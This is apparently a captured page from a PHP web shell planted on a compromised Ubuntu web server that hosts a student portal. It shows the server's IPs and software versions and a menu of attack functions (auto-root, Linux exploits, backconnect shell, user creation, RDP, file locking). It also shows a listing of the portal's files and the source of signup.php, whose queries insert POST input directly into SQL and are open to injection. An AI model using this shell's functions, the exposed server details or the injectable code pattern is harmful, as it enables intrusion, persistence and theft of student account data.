Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.217.76.59
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
demo /
studentportal_22 /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
html_modules
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
sms
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
MainPage.html
7.78
KB
-rwxr-xr-x
MainPage2.html
15.28
KB
-rwxr-xr-x
Thumbs.db
2.5
KB
-rwxr-xr-x
cManualMailer.php
3.69
KB
-rwxr-xr-x
database.php
374
B
-rwxr-xr-x
emaillogTest.php
1.43
KB
-rwxr-xr-x
forgot-password.html
5.51
KB
-rwxr-xr-x
forgot-password.php
2.19
KB
-rwxr-xr-x
forgotPassword.html
4.85
KB
-rwxr-xr-x
getLocation.php
429
B
-rwxr-xr-x
getstatesanduniv.php
419
B
-rwxr-xr-x
helpdesk.html
2.2
KB
-rwxr-xr-x
index.html
5.06
KB
-rwxr-xr-x
index2.html
9.49
KB
-rwxr-xr-x
info.php
96
B
-rwxr-xr-x
instruction.html
4.39
KB
-rwxr-xr-x
lastdate.html
3.13
KB
-rwxr-xr-x
pgResponse.php
4.3
KB
-rwxr-xr-x
registration.html
7.25
KB
-rwxr-xr-x
registration.php
543
B
-rwxr-xr-x
resetpassword.php
696
B
-rwxr-xr-x
sendGridMail.php
1.2
KB
-rwxr-xr-x
sendMobEmailOTP.php
3.44
KB
-rwxr-xr-x
sign-up.html
8.37
KB
-rwxr-xr-x
signin.php
1.44
KB
-rwxr-xr-x
signup.php
830
B
-rwxr-xr-x
sms.html
54.9
KB
-rwxr-xr-x
sms_09082018.html
55.58
KB
-rwxr-xr-x
smsindex.html
4.37
KB
-rwxr-xr-x
smsmobilenos.php
255
B
-rwxr-xr-x
validateInfo.php
1.69
KB
-rwxr-xr-x
validateRegno.php
562
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : signup.php
<?php include ("database.php"); error_reporting(E_ALL); ini_set('display_errors', 'on'); $mobile = trim($_POST['mobile']); $mobileotp = trim($_POST['motp']); $emailotp = trim($_POST['eotp']); //and fmobileotp = '3313' $query = "SELECT * from masuser where fmobileno = '{$mobile}' and fmobileotp = '{$mobileotp}' and femailotp = '{$emailotp}' and ROUND(time_to_sec((TIMEDIFF(NOW(), fmobotptime))) / 60) <= 5"; $result = mysqli_query($conn,$query); $count = mysqli_num_rows($result); if($count >0) { $query = "update masuser set femailvalid = 'T', fmobilevalid = 'T', factive = 'T' where fmobileno = '{$mobile}'"; $result = $conn->query($query); if($result == 1) { $arr["status"] = 'success'; } else { $arr["status"] = 'error'; } } else { $arr["status"] = 'invalid'; } echo json_encode($arr); ?>
Close